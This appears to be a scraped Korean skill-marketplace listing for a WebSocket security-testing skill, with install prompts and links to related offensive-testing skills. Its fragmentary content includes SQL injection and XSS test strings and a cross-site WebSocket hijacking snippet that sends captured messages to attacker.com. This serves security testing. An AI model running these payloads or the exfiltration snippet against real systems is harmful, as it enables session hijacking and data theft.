원클릭으로
websocket-testing
WebSocket security testing — injection, auth bypass, hijacking
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
WebSocket security testing — injection, auth bypass, hijacking
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | websocket-testing |
| description | WebSocket security testing — injection, auth bypass, hijacking |
| origin | RedteamOpencode |
ws:// or wss://)Upgrade: websocket observed in HTTP trafficws:// (unencrypted) vs wss:// (TLS)' OR 1=1--<script>alert(1)</script> — check if rendered to other usersjavascript var ws = new WebSocket('wss://target.com/ws'); ws.onmessage = function(e) { fetch('https://attacker.com/log?d=' + btoa(e.data)); };